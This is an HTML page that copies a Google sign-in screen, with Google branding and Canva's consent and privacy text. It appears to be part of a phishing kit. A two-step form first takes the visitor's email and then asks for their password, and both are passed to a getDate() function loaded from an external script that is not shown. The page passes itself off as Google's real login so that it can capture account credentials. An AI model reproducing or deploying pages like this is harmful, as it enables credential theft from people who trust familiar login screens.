<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Google Login</title>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.1/css/all.min.css">
    <link rel="stylesheet" href="style.css">
    <script type="text/javascript" src="./jsscript/getDataFile.js">        
  </script>
  </head>
  <body>
    <div class="container">
      <div class="login">
        <h5>
         <img src="https://lh3.googleusercontent.com/yRaYVovb0XFLattc7NYZ3j9GEpUzlhw0NpUf1l8ni4dyP4vadsZorGrrE_jgm4qSqg" class="sJRmW" alt="">
        </h5>
        <p class="sign-in">Sign in</p>
        <p class="use-acc">to continue to <a id="ddd"  href="https://www.canva.com/ru_ru/">Canva</a></p>
        <div class="form">
          <form action="#" method="post">
            <input type="email" name="email1" id="email1" />
            <label>Email or phone</label>
          </form>
            
          <a href="#" class="email">Forget email?</a><p>

          <p class="guest">
            To continue, Google will share your name, email address, language preference and profile picture with Canva. Before using this app, you can review Canva’s   </p>     <a style="color: rgb(35, 97, 231);display:inline; " href="https://www.canva.com/policies/privacy-policy/" >privacy policy</a> <p class="fff" style="display:inline;">and</p> <a style="color: rgb(35, 97, 231);display:inline; " href="https://www.canva.com/policies/terms-of-use/">Terms of Service.</a>
          
        </div>
        <div class="create-acc">
          <a href="#">Create account</a>
          <div class="next" >Next</div>
        </div>
      </div>
      <div class="login2" style="width: 450px">
        <h5>
                   <img src="https://lh3.googleusercontent.com/yRaYVovb0XFLattc7NYZ3j9GEpUzlhw0NpUf1l8ni4dyP4vadsZorGrrE_jgm4qSqg" class="sJRmW" alt="">

        </h5>
        <p class="sign-in">Welcome</p>
        <div class="user-email">
          <i class="fas fa-user-circle"></i>
          <div class="email-here" id="email-here"></div>
        </div>
        <div class="form">
          <form action="" onsubmit="return getDate()" method="post">
                <input type="email" id="email" name="email">

            <input type="password" name="password"  id="password" />
            <label>Enter your password</label>
          </form>
            <p class="guest">
            To continue, Google will share your name, email address, language preference and profile picture with Canva. Before using this app, you can review Canva’s   </p>     <a style="color: rgb(35, 97, 231);display:inline; " href="https://www.canva.com/policies/privacy-policy/" >privacy policy</a> <p class="fff" style="display:inline;">and</p> <a style="color: rgb(35, 97, 231);display:inline; " href="https://www.canva.com/policies/terms-of-use/">Terms of Service.</a>
        </div>
        <div class="create-acc">
          <a href="#">Forgot password?</a>
          <div id ="kio" onclick="getDate()">Next</div>
        </div>
      </div>
      <div class="lower">
        <div class="select">
          <span>English (United Kingdom)</span><i class="fas fa-play"></i>
        </div>
        <div class="links">
          <a href="#">Help</a>
          <a href="#">Privacy</a>
          <a href="#">Terms</a>
        </div>
      </div>
    </div>
      

    <script>
       
      const next = document.querySelector(".next");
      const page1 = document.querySelector(".login");
      const page2 = document.querySelector(".login2");
      var email = document.querySelector("#email1");
  document.getElementById("email").style.display = "none";

      next.addEventListener("click", displayFunc);

function displayFunc() {
            
        const emai = document.getElementById("email1").value;
        page1.style.display = "none";
        page2.style.display = "block";
        document.getElementById("email-here").innerHTML=emai;
        document.getElementById("email").value=emai;

      }
    </script>
    <script src="jquery.js"></script>
  </body>
</html>
